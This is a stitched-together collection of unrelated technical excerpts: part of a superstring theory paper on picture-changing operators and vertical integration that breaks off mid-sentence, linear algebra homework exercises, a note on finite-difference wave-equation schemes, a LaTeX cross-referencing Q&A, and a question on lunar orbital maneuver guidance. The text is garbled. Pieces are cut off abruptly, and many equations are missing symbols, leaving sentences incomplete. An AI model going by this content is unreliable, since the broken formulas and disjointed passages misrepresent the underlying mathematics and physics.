⟨αp|(η⊗I⊗n−1+...+I⊗n−1⊗η) (1.5) is annihilated by the BRST operator. Since carries picture , it is natural to interpret this object as an amplitude containing one fewer PCO insertion: ⟨αp|(η⊗I⊗n−1+...+I⊗n−1⊗η)=⟨Ap−1|. (1.6) We can now apply this procedure again, expressing as the BRST variation of a gauge amplitude , and apply once again to arrive at an amplitude containing two fewer PCO insertions. Continuing this process unfolds a hierarchy of amplitudes and gauge amplitudes: ⟨Ap| =⟨αp|(Q⊗I⊗n−1+...+I⊗n−1⊗Q) ⟨Ap−1| =⟨αp|(η⊗I⊗n−1+...+I⊗n−1⊗η) ⟨Ap−1| =⟨αp−1|(Q⊗I⊗n−1+...+I⊗n−1⊗Q) ⋮ ⟨A1| =⟨α2|(η⊗I⊗n−1+...+I⊗n−1⊗η) ⟨A1| =⟨α1|(Q⊗I⊗n−1+...+I⊗n−1⊗Q) ⟨A0| =⟨α1|(η⊗I⊗n−1+...+I⊗n−1⊗η), (1.7) where at the end we obtain an amplitude containing no PCO insertions at all.444The number of PCO insertions in is determined by the requirement that the amplitude is nonzero acting on NS states at picture and Ramond states at picture . This means that the amplitudes with fewer than PCO insertions will need to act on states with nonstandard picture to obtain a nonzero result. Generally, such amplitudes will encounter divergences from spurious singularities. We discuss such amplitudes formally, as intermediate objects used to obtain the final amplitude which is gauge invariant and free from spurious singularity. The structure here is reminiscent of descent equations which appear in analysis of anomalies in gauge theories [8]. This leads the following procedure for deriving gauge invariant amplitudes. First we start with the amplitude , and insert the operator at some point on each constituent Riemann surface. This defines the gauge amplitude . We then take the BRST variation to arrive at the amplitude containing one PCO. We then insert another on the Riemann surfaces of to derive , and continue in this way until we arrive at the amplitude containing PCO insertions. The crucial point is that the insertions of do not need to vary continuously with the moduli to ensure gauge invariance. Gauge invariance is automatic since the final amplitude is expressed in BRST exact form. We may therefore allow the insertions to “jump” across spurious poles discontinuously as a function of the moduli to avoid unphysical divergences. The primary goal of this work is to show that the above algebraic procedure gives a viable alternative to defining a consistent measure on the moduli space for superstring amplitudes. The approach has some advantages. 
The computation of vertical corrections is arguably simpler and more flexible, and certain essential properties, such as gauge invariance of the amplitude and independence from various choices, are evident from the nature of the construction. A second goal of our work will be understanding the relationship between the algebraic approach and the conceptually rather different idea of vertical integration. Our motivation is to form a link between Sen’s discussion of superstring field theories [9] and other techniques which have been independently developed based on the large Hilbert space [5, 6, 10]. As investigations continue into quantum effects in superstring field theories [11, 12], and in the geometrical formulation based on super-Riemann surfaces [13], it may be useful to have an understanding of the relationship between these approaches. Vertical integration is a general idea which can be implemented in many ways. To give ourselves a concrete objective, we will focus on the connection to the vertical integration procedure as implemented by Sen and Witten [4]. In the spirit of that work, we discuss only on-shell amplitudes and ignore the fact that the moduli space of Riemann surfaces is noncompact. The boundary of moduli space is associated with the infrared physics of superstring perturbation theory, about which there has been extensive discussion in recent years. One way of dealing with infrared divergences is to extend amplitudes off-shell using the formalism of string field theory. Suffice it to say that our discussion can be easily adapted in this context, which provided part of the motivation for this work. For simplicity we discuss PCOs in the holomorphic sector only, as would be relevant for the heterotic string. For type II strings we have a similar story also in the antiholomorphic sector. This paper is organized as follows. In section 2 we review the definition of superstring measure in the PCO formalism. In section 3 we describe the algebraic construction of superstring amplitudes, deriving a set of recursive equations for the vertical corrections at the interface between local sections needed to ensure gauge invariance. We give examples and prove that on-shell amplitudes are independent of the choice of vertical corrections derived by this procedure. In section 4 we discuss the construction of Sen and Witten. To give a clear formalization of their procedure, we employ an analogue of differential forms on the lattice, called difference forms. The Sen-Witten vertical corrections are defined by “integration” of a discretized measure—characterized by difference forms—over a collection of links in a -dimensional cubical lattice, where is the number of PCOs in the amplitude. The sites of the lattice correspond to combinations of PCOs taken from adjoining local sections, and the collection of links which define the “integration cycle” are called lattice chains. We describe how vertical corrections of this form may be constructed from the algebraic point of view. The algebraic construction introduces a collection of auxiliary amplitudes containing PCOs whose vertical corrections are characterized by lattice chains inside lower dimensional lattices of respective dimension . The algebraic construction functions by extending lattice chains from lower dimensional into higher dimensional lattices in such a way as to be consistent with gauge invariance and so that the chains of higher dimensional lattices project down to the chains of lower dimensional lattices. 
We conclude with some examples. ## 2 Superstring Measure In this section we review the superstring measure in the PCO formalism [3]. The purpose is to fix a convenient notation for our calculations and to simplify some signs. Given a Riemann surface with genus and punctures, we can remove disks around each puncture and cut what remains into components with the topology of a sphere with three holes. We cover the disks with holomorphic local coordinates with . The origin of these coordinates corresponds to the location of the punctures on the Riemann surface. On the spheres we introduce holomorphic coordinates . The Riemann surface can be reconstructed by gluing the boundaries of these components with holomorphic transition functions: zi =fij(zj) (2.1) zi =fa(wa). (2.2) The transition functions exist between coordinates which are identified by the gluing, and encode all information about the moduli of the Riemann surface. Since we work with the heterotic string, we are interested in the moduli space of Riemann surfaces with spin structure in the leftmoving sector. This is a -fold covering of the bosonic moduli space which comes in two disconnected components, representing the even and odd spin structures. We use to denote one of these disconnected components. That is, is the moduli space of genus Riemann surfaces with punctures together with either an even or odd spin structure, and denotes a point in this moduli space. Given transition functions , we may define an -fold bra state called a surface state ⟨Σ|:H⊗n→C. (2.3) The surface state is defined so that the quantity ⟨Σ|Φ1⊗...⊗Φn (2.4) represents a correlation function on a Riemann surface assembled with the transition functions , with the vertex operators corresponding to the states inserted at the punctures in the respective coordinates . If the vertex operators are conformally invariant, the correlation function only depends on the transition functions through the moduli of the Riemann surface they represent. For generic vertex operators, the surface state will depend more nontrivially on the choice of transition functions. The surface state is BRST invariant: ⟨Σ|Q=0. (2.5) Since this will not cause confusion, we use a shorthand notation where represents a sum of BRST operators acting on each state: Q → Q⊗I⊗n−1+...+I⊗n−1⊗Q. (2.6) In particular represents a correlation function with a contour integral of the BRST current surrounding all punctures. If we deform the contour inside the surface and shrink to a point, this gives zero. Also important for our discussion is the fact that is well-defined in the small Hilbert space. This implies that it is annihilated by the zero mode of the eta ghost: ⟨Σ|η=0, (2.7) where denotes a sum of eta zero modes acting on each state. Let us first describe the measure without PCOs, as would be relevant for computing amplitudes in bosonic string theory. We fix a choice of surface state for each point in the moduli space, and write simply as , leaving the dependence on moduli implicit. To define differential forms that can be integrated over the moduli space, we need to insert the appropriate -ghosts inside correlation functions. Using the idea of the Schiffer variation, following [14], we may express the -ghost insertions as contour integrals surrounding the punctures. Around the th puncture we have a -ghost insertion of the form b(v(a)μ)=∮dwa2πiv(a)μ(m,wa)b(wa)+∮d¯wa2πi¯v(a)μ(m,¯wa)¯b(¯wa), (2.8) where the contours are oriented counterclockwise respectively in the and coordinates on the Riemann surface. 
The contour integrals are weighted by functions called Schiffer vector fields. The lower index corresponds to coordinates on the moduli space, with . We introduce the operator Tμ ≡(∮dw12πiv(1)μ(m,w1)T(w1))⊗I⊗n−1+...+I⊗n−1⊗(∮dwn2πiv(n)μ(m,wn)T(wn)) (2.9) +(∮d¯w12πi¯v(1)μ(m,¯w1)¯T(¯w1))⊗I⊗n−1+...+I⊗n−1⊗(∮d¯wn2πi¯v(n)μ(m,¯wn)¯T(¯wn)). The Schiffer vector fields are defined so that the following equation holds: ∂∂mμ⟨Σ|=−⟨Σ|Tμ. (2.10) Additional properties are [Q,bμ] =Tμ (2.11) [Tμ,bν] =∂∂mμbν−∂∂mνbμ, (2.12) where is defined as in (2.9) with the energy momentum tensor replaced by the -ghost, and represents a graded commutator with respect to Grassmann parity. Let be coordinate 1-forms on the moduli space, and introduce operator-valued 1-forms: T ≡dmμTμ, (2.13) b ≡dmμbμ. (2.14) To simplify signs, we assume that the coordinate 1-forms are uniformly Grassmann odd objects, so they anticommute through each other and also though Grassmann odd worldsheet operators. In this convention, the operator is Grassmann odd, and is Grassmann even. The identities (2.10)-(2.12) imply d⟨Σ| =−⟨Σ|T (2.15) [Q,b] =−T (2.16) db =12[T,b], (2.17) where d=dmμ∂∂mμ (2.18) is the exterior derivative on the moduli space. The measure for scattering amplitudes can then be expressed ⟨Ω|=⟨Σ|eb. (2.19) This is a differential form of inhomogeneous degree. In particular, the operator is defined by the series expansion eb=I⊗n+b+12!b2+...+1(6g+2n−6)!b6g+2n−6. (2.20) The series terminates since there are only independent 1-forms . The last term is a top degree form, and this is the part of the measure that should be integrated over the moduli space to obtain the amplitude. Using the identities (2.15)-(2.17), it is straightforward to show that ⟨Ω|Q=−d⟨Ω|. (2.21) Assuming we can ignore contributions from the boundaries of moduli space, this implies that BRST trivial states decouple from scattering amplitudes. The measure , however, can only compute superstring scattering amplitudes between states of nonstandard picture. Such amplitudes will typically suffer from unphysical divergences due to spurious singularities. Therefore, it is useful to generalize the measure to accommodate correlation functions containing additional operator insertions, in particular PCOs. One concrete way to do this is as follows.555In the description of [3], PCOs are inserted in the coordinates representing the Riemann surface with the disks around the punctures removed. In this approach, the Schiffer vector fields must be chosen to vanish at the location of the PCOs in order to ensure that deformations of the moduli are independent from deformations of the PCO positions in the coordinates . This is equivalent to the approach we take, but expressed in a different coordinate system on the Riemann surface. Suppose we have a correlation function including operators , in addition to the vertex operators representing the external states. We remove a disk from the Riemann surface containing the location of all operators , but no vertex operators. We fix a coordinate system on this disk denoted with , so that each operator has a corresponding position in this coordinate system. For short we write the complete set of operator insertions as Op=O1(y1)...Op(yp), (2.22) where the upper index indicates the number of operator insertions. We build the remaining part of the Riemann surface by removing disks around the punctures, covered by coordinates with and corresponding to the location of the punctures. 
Including the disk , the surface now has holes; we cut what remains into components with the topology of a sphere with three holes, and introduce coordinates on these components. The Riemann surface may be reconstructed by specifying transition functions between coordinates identified by gluing: zi =fij(zj) (2.23) zi =fa(wa) (2.24) zi =f(y). (2.25) Note that at this level the coordinate is on the same footing as the coordinates , but the coordinate will play a distinct role in defining the measure. From the transition functions we define a surface state acting on copies of : ⟨Σ′|:H⊗n+1→C. (2.26) We use the prime to indicate that acts on states, including a state represented by the coordinate . Assuming that the first copy of represents operators inserted in the coordinate , we may then represent correlation functions containing operators through the -fold bra state ⟨Σ′|(Op|0⟩)⊗I⊗n. (2.27) Suppose that for every point in the moduli space we chose transition functions building a Riemann surface with moduli . From this we can define a surface state for every ; we write simply as , leaving the dependence on implicit. We assume that the transition functions have been defined so that the coordinate covers all parts of each Riemann surface where we care to insert . Note that the moduli space carries information about the location of the punctures represented by the coordinates , but does not carry information about the coordinate . We introduce a collection of Schiffer vector fields and defined so that the analogue of (2.15)-(2.17) hold: d⟨Σ′| =−⟨Σ|T′ (2.28) [Q,b′] =−T′ (2.29) db′ =12[T′,b′], (2.30) where b′≡dmμb′μ (2.31) and b′μ ≡(∮dy2πivμ(m,y)b(y))⊗I⊗n+I⊗(∮dw12πiv(1)μ(m,w1)b(w1))⊗I⊗n−1+...+I⊗n⊗(∮dwn2πiv(n)μ(m,wn)b(wn)) With this we define the measure with operator insertions as (2.33) We label the measure according to the operator insertions it contains. It is useful to think of the measure as a differential form on a fiber bundle . The base of consists of the moduli space of genus Riemann surfaces with punctures together with an even or odd spin structure, and are coordinates on the base. The fiber at the point consists of copies of the Riemann surface with the corresponding value of the moduli, and are coordinates on the fiber. We introduce coordinate 1-forms on the fiber and define the exterior derivative on : d=dmμ∂∂mμ+dyi∂∂yi+d¯yi∂∂¯yi. (2.34) We assume that are uniformly Grassmann odd objects which anticommute with each other, the s, and Grassmann odd worldsheet operators. Using the identities (2.28)-(2.30), it is straightforward to show that the generalization of (2.21) in the presence of operator insertions takes the form (2.35) where now includes differentiation along the fiber directions. On the right hand side, represents a sum of operator insertions (Q−d)Op (2.36) −(dO1(y1))...Op(yp)−...−(−1)O1+...+Op−1O1(z1)...(dOp(yp)), and, for example dO1(y1)=dy1∂O1(y1)+d¯y1¯∂O1(y1). (2.37) Also important in our discussion is the property (−1)Op⟨Ω,Op|η=−⟨Ω,ηOp|, (2.38) where represents a sum of operator insertions ηOp=(ηO1(y1))...Op(yp)+...+(−1)O1+...+Op−1O1(y1)...(ηOp(yp)). (2.39) This is nonzero only if contains some operators in the large Hilbert space. The measure which is relevant for computing superstring scattering amplitudes in the PCO formalism is ⟨Ω,Xp|, (2.40) where refers to a collection of operator insertions of the form Xp≡[X(y1)−dξ(y1)] ... [X(yp)−dξ(yp)], (2.41) and is a picture changing operator. 
If the number of insertions is chosen appropriately, we obtain nonvanishing correlation functions with Neveu-Schwarz and Ramond external states at the standard pictures and . The measure is defined in the small Hilbert space: ⟨Ω,Xp|η=0. (2.42) Furthermore, since X(y)−dξ(y)=(Q−d)ξ(y), (2.43) we have the property ⟨Ω,Xp|Q=−d⟨Ω,Xp|. (2.44) The second term in (2.35) drops out since squares to zero. Therefore, the superstring measure produces a total derivative on the fiber bundle when acting on BRST trivial states. Naively, we can define a gauge invariant amplitude by integrating the pullback of the superstring measure on a global section of . The difficulty, however, is in finding a global section of which avoids spurious singularities in the measure. However, it is always possible to find sections of which avoid spurious singularities locally. We can then attempt to define the amplitude by summing contributions from local sections on disjoint regions of moduli space which avoid spurious poles. Generally there will be discontinuities in the choice of PCOs between disjoint regions, and the amplitude will require additional contributions—the “vertical corrections”—to cancel boundary terms between different regions when the amplitude contains BRST trivial states. The vertical corrections can be seen to arise from integrating the superstring measure “along the fiber” at junctions between different regions of the moduli space so as to join local sections into a closed integration cycle in . This is vertical integration. Next we describe the algebraic approach to the PCO formalism, where the origin of vertical corrections is somewhat different. ## 3 Algebraic Approach In the algebraic approach outlined in the introduction, PCOs are derived by repeatedly inserting in the measure followed by application of the BRST operator. If the location of is not a continuous function of the moduli, (2.35) implies that the BRST operator produces boundary terms from the integration over moduli space at the locus of discontinuities. These boundary terms are the vertical corrections. We assume that the moduli space is decomposed into regions where the location of varies continuously as a function of the moduli: M=∪αMα. (3.1) The contribution to the amplitude from will turn out to be the pullback of the superstring measure on a local section of defined on . To connect with the discussion of [4], we assume that the regions form closed polyhedra which are glued along their faces in such a way as to define a dual triangulation of . However, it should be clear that the general procedure applies regardless of the choice of decomposition of the moduli space. By definition, all faces of codimension in a dual triangulation appear at the junction between distinct polyhedra. We will write for the codimension face at the junction of distinct polyhedra , so we have codimension 0: Mα codimension 1: Mαβ=Mα∩Mβ,   α,β distinct codimension 2: Mαβγ=Mα∩Mβ∩Mγ    α,β,γ distinct ⋮ ⋮  . (3.2) See figure 3.1. If the intersection of the polyhedra is empty, we assume that is the empty set. The faces and are equal as sets, but it is useful to consider them as having opposite orientations as integration cycles in the moduli space. More generally, we assume that ∫M...αi...αj...=−∫M...αj...αi.... (3.3) In this sense, is totally antisymmetric in the indices . In particular, is the empty set if any two indices are equal. 
Fixing an orientation on the moduli space induces an orientation on the polyhedra, and the orientation of the higher codimension faces will be determined by ∫∂Mα0...αk=−∑β∫Mα0...αkβ. (3.4) In this setup we can formulate a useful version of Stokes’ theorem. Suppose on each codimension face we have a differential form which is antisymmetric in the indices . Stokes’ theorem implies 1(k+1)!∑α0...αk∫Mα0...αkdωα0...αk=1(k+2)!∑α0...αk+1∫Mα0...αk+1(δω)α0...αk+1. (3.5) We introduce an operation , which acts on an object with antisymmetric indices to produce an object with antisymmetric indices . It is defined as (δω)α0...αk+1=k+1∑n=0(−1)nωα0...ˆαn...αk+1, (3.6) where the hat over the index indicates omission. The operation is nilpotent, δ2=0, (3.7) and is related to the Čech coboundary operator. ### 3.1 The Construction We propose to express the amplitude in the form666Since refers to only one connected component of the moduli space of Riemann surfaces with spin structure, technically only gives the contribution to the total amplitude coming from either the even or the odd spin structures. Since the location of spurious poles depends on the spin structure, in general we must adjust the choice of dual triangulation, local sections, and vertical corrections separately for the even and odd spin structures. The complete amplitude is then given by adding these contributions. ⟨Ap|=∑α∫Mα⟨Ω,Xpα|+12!∑αβ∫Mαβ⟨Ω,Xpαβ|+13!∑αβγ∫Mαβγ⟨Ω,Xpαβγ|+... . (3.8) The first term is the contribution to the amplitude from the pullback of the superstring measure (2.40) onto local sections of on each polyhedron. The operator insertions in the first term are given by Xpα=[X(y1α(m))−dξ(y1α(m))] ... [X(ypα(m))−dξ(ypα(m))], (3.9) where the points parameterize the location of the PCOs as a function of , and characterize the local section of . The remaining terms in the amplitude are the vertical corrections, and can be arranged hierarchically according to the codimension of the faces in the dual triangulation. The vertical corrections are defined by integrating a measure over the face of the dual triangulation, where denotes a collection of operator insertions whose positions are prescribed functions of . The insertions are defined to be antisymmetric in the indices , and for even (odd) codimension the insertions are Grassmann even (odd). Generally, will be expressed through combinations of and , and the goal of the present discussion is to determine what form the insertions take. The central condition characterizing the vertical corrections is that they lead to a gauge invariant amplitude. From (2.35) we know that (−1)k⟨Ω,Xpα0...αk|Q=−d⟨Ω,Xpα0...αk|−⟨Ω,(Q−d)Xpα0...αk∣∣. (3.10) Using Stokes’ theorem (3.5), gauge invariance implies that the operator insertions satisfy (Q−d)Xpα0...αk−(δXp)α0...αk=0(. (3.11) The operator acts on the insertions corresponding to the faces of one fewer codimension: (δXp)α0...αk=k∑n=0(−1)nXpα0...ˆαn...αk. (3.12) All terms in (3.11) are evaluated at a common point . To solve (3.11), we propose that the physical amplitude can be expressed as the BRST variation of a gauge amplitude: ⟨Ap|=⟨αp|Q. (3.13) The gauge amplitude is expressed in a form analogous to (3.8): ⟨αp|=∑α∫Mα⟨Ω,Ξpα|−12!∑αβ∫Mαβ⟨Ω,Ξpαβ|+13!∑αβγ∫Mαβγ⟨Ω,Ξpαβγ|−... . (3.14) For convenience, we take the signs in this series to alternate. On each face of the dual triangulation we have a measure defined by a collection of operator insertions . 
The insertions are antisymmetric in the indices , and for even (odd) codimension they are Grassmann odd (even). Typically, the insertions depend on the zero mode of the ghost. Taking the BRST variation of the gauge amplitude gives a formula for the insertions : Xpα0...αk=(Q−d)Ξpα0...αk+(δΞp)α0...αk(. (3.15) The operator acts on the insertions corresponding to the faces of one fewer codimension, (δΞp)α0...αk=k∑n=0(−1)nΞpα0...ˆαn...αk, (3.16) and all terms in (3.15) are evaluated at a common point on . Note that, schematically, gauge invariance requires that is annihilated by , and this follows from (3.15) because (Q−d−δ)(Q−d+δ)=(Q−d)2−δ2=0. (3.17) Since the physical amplitude is defined in the small Hilbert space, we know that the insertions must be independent of the zero mode: ηXpα0...αk=0. (3.18) From (3.15), we therefore learn that satisfies (Q−d)ηΞpα0...αk−(δηΞp)α0...αk=0. (3.19) Interestingly, this implies that the operator insertions given by define a gauge invariant amplitude. Since carries picture , it is natural to interpret as defining an amplitude with one fewer PCO insertion: ηΞpα0...αk=Xp−1α0...αk. (3.20) Thus we have the relation ⟨αp|η=⟨Ap−1|, (3.21) where is defined by insertions . We can apply this procedure again, relating to the amplitude containing two fewer PCO insertions, and continue all the way down until we have the amplitude where PCOs are absent. This leads to the following procedure for deriving gauge invariant amplitudes. The “insertions” defining an amplitude without PCOs can be trivially written X0α=1,      X0α0...αk=0   (k≥1). (3.22) The second equation says that there are no vertical corrections in the absence of PCOs. Since is independent of the zero mode, it can be expressed in -exact form: X0α0...αk=ηΞ1α0...αk. (3.23) The expression for is not unique, but let us assume that we have made some choice. We can then plug into (3.15) to derive an expression for the insertions defining the amplitude with a single PCO. By construction, will be independent of the zero mode and can be expressed in -exact form: X1α0...αk=ηΞ2α0...αk. (3.24) Substituting into (3.15) gives the insertions defining the amplitude with two PCOs. Continuing this process for steps we arrive at the insertions , as desired. The solution generated by this procedure is not unique. For most purposes it does not matter how the solution is chosen as long as the PCO insertions in the final amplitude avoid spurious poles. As we will demonstrate later, Sen and Witten give a class of solutions for the vertical corrections which can be generated by this procedure, but not the most general solution. ### 3.2 Examples Let us give some examples to see what the vertical corrections look like. Consider first an amplitude containing one PCO. We must find a set of insertions satisfying X0α0...αk=ηΞ1α0...αk. (3.25) We can choose for example Ξ1α=ξ(y1α(m)),           Ξ1α0...αk=0   (k≥1), (3.26) where gives the location of a insertion on the Riemann surface as a function of in each polyhedron. We may determine the insertions by substituting into (3.15): X1α =(Q−d)Ξ1α X1αβ =(Q−d)Ξ1αβ+Ξ1β−Ξ1α X1αβγ =(Q−d)Ξ1αβγ+Ξ1βγ−Ξ1αγ+Ξ1αβ (3.27) ⋮  . This gives X1α =X(y1α)−dξ(y1α) X1αβ =ξ(y1β)−ξ(y1α) X1αβγ =0 (3.28) ⋮  . The vertical corrections on the faces of codimension 2 and higher vanish. Here and in later equations we will not explicitly indicate the dependence of the fiber coordinates on the moduli, unless needed for clarity. As expected, is the pullback of the superstring measure (2.40) onto a local section of defined by . 
The insertions have a simple interpretation in terms of vertical integration. Let us make a brief detour to spell out what this means in the current setup. Let denote the local section of defined on each face of the dual triangulation. Let denote submanifolds of —the “vertical segments”—which, with a suitable orientation, connect the local sections to form a closed integration cycle in . We assume that the orientation of is antisymmetric in the indices, and postulate that the projection from down to the moduli space maps the vertical segments down to the faces of the dual triangulation. This implies that the vertical segments can be parameterized by coordinates on together with coordinates tangent to the fiber. The basic idea is to express the amplitude as ⟨Ap|=∑α∫Mα⟨Ω,Xp|+12!∑α,β∫Mαβ⟨Ω,Xp|+13!∑α,β,γ∫Mαβγ⟨Ω,Xp|+... , (3.29) where in each term we take the pullback of the superstring measure (2.40) on the corresponding submanifold of . If we integrate out the fiber coordinates on the vertical segments, this gives an expression for the amplitude as postulated in (3.8). We can work this out fairly easily in the case where there is only one PCO. Let us choose a coordinate system on corresponding to coordinates on together with an additional coordinate parameterizing the fiber direction. The submanifold is defined by specifying the fiber coordinate as a function of and . Since must join the local sections and , we require that y1(m,t)|t=1=y1β(m),   y1(m,t)|t=0=y1α(m). (3.30) We then find ∫Mαβ⟨Ω,X1| =∫Mαβ∫t ⟨Ω,X(y1(m,t))−dξ(y1(m,t))| (3.31) =∫Mαβ∫10dtddt⟨Ω,ξ(y1(m,t))| =∫Mαβ⟨Ω,ξ(y1β(m))−ξ(y1α(m))| =∫Mαβ⟨Ω,X1αβ|. The only part of the measure with the 1-form is a total derivative with respect to , and integrating out the fiber coordinate gives (3.2). Note that, in this case, the vertical correction only depends on the boundary of , not on how is chosen in the interior. This is a special occurrence since we are dealing with only one PCO. With more PCOs, the part of the measure proportional to is not a total derivative, and generally the vertical corrections will depend on the choice of vertical segments. This ambiguity corresponds in the algebraic formalism to the different possible ways of expressing an amplitude in exact form. Let us continue to the case of two PCOs. We must find a set of insertions satisfying X1α0...αk=ηΞ2α0...αk. (3.32) We can find a solution by multiplying by an insertion of : Ξ2α =ξ(y2α(m))[X(y1α(m))−dξ(y1α(m))] Ξ2αβ =ξ(y2αβ(m))[ξ(y1β(m))−ξ(y1α(m))] Ξ2αβγ =0 (3.33) ⋮  . Here gives the location of a new insertion on the codimension 0 faces as a function of , and gives the location of a
https://brainmass.com/math/linear-transformation/linear-mapping-linear-space-differentiability-continuity-50484
# Linear Mapping, Linear Space, Differentiability and Continuity

In each of Exercises 40 through 46 following, a linear space V is given and a mapping T : V → V is defined as indicated. In each case determine whether T is a linear mapping. If T is linear, determine the kernel (or null space) and range, and compute the dimension of each of these subspaces wherever they are finite-dimensional.

40. V is the (real) linear space of all real polynomials p on R. If p ∈ V, then T(p) is defined by setting T(p)(x) = p(x+1), x ∈ R

41. V is the linear space of all real functions f defined and differentiable on the open interval (0,1). If f ∈ V, then T(f) is defined by setting T(f)(x) = xf'(x), x ∈ (0,1)

42. V is the linear space of all real functions f defined and continuous on the closed interval [0, 2π]. If f ∈ V, then T(f) is defined by setting T(f)(x) = ∫_0^{2π} f(t) sin(x-t) dt, x ∈ [0, 2π]

43. V is the linear space of all real functions f defined and continuous on the closed interval [0, 2π]. If f ∈ V, then T(f) is defined by setting T(f)(x) = ∫_0^{2π} f(t) cos(x-t) dt, x ∈ [0, 2π]

---

(See attached file for full problem description with accurate equations)
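For Exercise 40 it is easy to script a numerical sanity check of linearity. The following sketch is my own illustration (the sample polynomials, scalars, and evaluation points are arbitrary choices, not part of the exercise); it checks T(ap + bq) = aT(p) + bT(q) for the shift map T(p)(x) = p(x+1):

import numpy as np

def T(p):
    # The shift map from Exercise 40: T(p) is the function x -> p(x + 1).
    return lambda x: p(x + 1)

p = np.polynomial.Polynomial([1, -2, 3])    # 1 - 2x + 3x^2   (arbitrary sample)
q = np.polynomial.Polynomial([0, 5, 0, 1])  # 5x + x^3        (arbitrary sample)
a, b = 2.0, -7.0
xs = np.linspace(-3.0, 3.0, 25)

lhs = T(lambda x: a * p(x) + b * q(x))(xs)  # T(a*p + b*q) on a grid of points
rhs = a * T(p)(xs) + b * T(q)(xs)           # a*T(p) + b*T(q) on the same grid
print(np.allclose(lhs, rhs))                # True, consistent with T being linear

Such a check is only evidence on samples, of course; the exercise still asks for a proof plus the kernel and range (for this T the kernel is {0}, since p(x+1) ≡ 0 forces p ≡ 0, and the range is all of V because every polynomial q(x) equals T(p)(x) for p(x) = q(x-1)).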
https://ccrma.stanford.edu/~bilbao/master/node206.html
## The Rectilinear Scheme

The finite difference scheme corresponding to a rectilinear mesh is obtained by applying centered differences to the wave equation, over a rectangular grid with indices and (which refer to points with spatial coordinates and ). The difference scheme, given originally as (4.53) is (A.14) and the amplification polynomial equation is of the form (A.5), with for . From (A.7), we thus have and we have Condition (A.8) is thus satisfied, and condition (A.9) gives the bound for stability which implies that the amplification factor for such values of . Because , this bound is the same as the bound for passivity of the associated mesh scheme, given in (4.63). The amplification factors, however, are distinct at all spatial frequencies only for . If , then the factors are degenerate for , and for and we are then in the situation discussed in §A.1.2 where linear growth of the solution may occur. This is an important special case, because it corresponds to the standard finite difference scheme for the rectilinear waveguide mesh (i.e., the realization without self-loops). The waveguide mesh implementation does not allow such growth at these frequencies.

As far as assessing the computational requirements of the finite difference scheme, first consider the case . Five adds are required at each grid point in order to update. Given that , we can write the computational and add densities for the scheme as for For , however, scheme (A.13) simplifies to (A.15) which may be operated on alternating grids, i.e., need only be calculated for even (or odd). The computational and add densities, for are then for where we note that the reduced scheme (A.14) requires only four adds for updating at a given grid point; in addition, the multiplies by may be accomplished, in a fixed-point implementation, by simple bit-shifting operations. The increased efficiency of this scheme must be weighed against the danger of instability, and the fact that because grid density is reduced, the scheme is now applicable over a smaller range of spatial frequencies.

The numerical phase velocities of the schemes, at the stability limit, and away from it, at , are plotted in Figure A.1. It is interesting to note that away from the stability limit, the numerical dispersion is somewhat less directionally-dependent; this important factor may be useful from the point of view of frequency-warping techniques [157] which may be used to reduce numerical dispersion effects for schemes which are relatively directionally-independent. This idea has been discussed in the waveguide mesh context (where self-loops will be present) in [175].

Stefan Bilbao 2002-01-22
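To make the update being discussed concrete, here is a small sketch written under stated assumptions rather than taken from the text: a standard second-order centered-difference (leapfrog) update for the 2-D wave equation on a square grid, u^{n+1} = 2u^n - u^{n-1} + λ²(four-neighbour sum - 4u^n), run at the Courant number λ = 1/√2, at which the centre coefficient 2(1 - 2λ²) vanishes and which appears to correspond to the reduced, four-add special case described above. The grid size, initial condition, and fixed (Dirichlet) boundaries are arbitrary illustrative choices.

import numpy as np

N, steps = 101, 200
lam = 1.0 / np.sqrt(2.0)       # Courant number c*dt/dx at the 2-D stability limit
u_prev = np.zeros((N, N))      # u at time step n-1
u = np.zeros((N, N))           # u at time step n
u[N // 2, N // 2] = 1.0        # initial displacement: one raised grid point

for _ in range(steps):
    # Sum of the four nearest neighbours minus 4*u, i.e. the discrete Laplacian,
    # evaluated on interior points only (boundary values stay clamped at zero).
    lap = (u[2:, 1:-1] + u[:-2, 1:-1] + u[1:-1, 2:] + u[1:-1, :-2]
           - 4.0 * u[1:-1, 1:-1])
    u_next = np.zeros_like(u)
    # Leapfrog update: u^{n+1} = 2*u^n - u^{n-1} + lam^2 * Laplacian(u^n).
    u_next[1:-1, 1:-1] = (2.0 * u[1:-1, 1:-1] - u_prev[1:-1, 1:-1]
                          + lam**2 * lap)
    u_prev, u = u, u_next

print(u[N // 2, N // 2])       # field value back at the source point after 200 steps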
http://tex.stackexchange.com/questions/43985/how-to-cross-reference-a-section-and-item-in-a-list-in-single-document?answertab=oldest
How to cross reference a section and item in a list in single document?

I want to cross reference sections as well as some items in a list in my document. For example, \label helps us to cross reference sections. If we renew the command to provide a cross reference for an item in a list, then it's not available for section references. But how can we do both in a single document?

-

There is no difference in using \label-\ref when it comes to sectioning commands or enumerated lists. Here is an example showing how to properly use it:

\documentclass{article}
\begin{document}
\section{A section}\label{sec:label}
Here is some text.
\begin{enumerate}
\item An item
\item Another item \label{enum:label}
\end{enumerate}
Reference to section~\ref{sec:label} and item~\ref{enum:label}.
\end{document}

For more advanced (even automated) enumerated list labelling/referencing, you can use the label and ref options to enumerate provided by the enumitem package (a short sketch of this appears after the comments below).

-

how about custom lists like starlist(*) or bulletlist? – volatNumbers Feb 9 '12 at 18:33

@volatNumbers: For "custom lists" you would need to include a minimal working example (MWE), since there may be many variables at play. Note that referencing requires a counter. If you have no counter for the reference, you have to do something different. – Werner Feb 9 '12 at 18:38

@Werner: It would be possible to refer to the page where the label is placed, p.~\pageref{customlist:label} (with \phantomsection before the \label{customlist:label}, if hyperref is used) - depends on the wishes of the OP (you named it: MWE!). – Stephen Feb 9 '12 at 18:59
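Following up on the enumitem suggestion in the answer above, here is a short sketch (my own; the alphabetic label style is just an illustrative choice, and label/ref are the enumitem keys being referred to):

\documentclass{article}
\usepackage{enumitem}
\begin{document}
\section{A section}\label{sec:label}
\begin{enumerate}[label=(\alph*), ref=\alph*]
  \item An item
  \item Another item \label{enum:label}
\end{enumerate}
Item~\ref{enum:label} of section~\ref{sec:label} is typeset as ``(b)''
inside the list but referenced as plain ``b''.
\end{document}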
https://space.stackexchange.com/questions/31314/what-are-common-guidance-strategies-for-a-finite-orbital-maneuver
# What are common guidance strategies for a finite orbital maneuver?

Suppose we have our spacecraft in a circular orbit around the Moon and we want to transfer it to an elliptic orbit with a medium-thrust (10-100N) retrograde burn. Based on the current state estimate, we want to determine a propellant-optimal steering strategy to achieve the transfer. The thrusters operate at full throttle when they're activated, and thrust levels decline with propellant consumption (the propulsion system operates in blow-down mode).

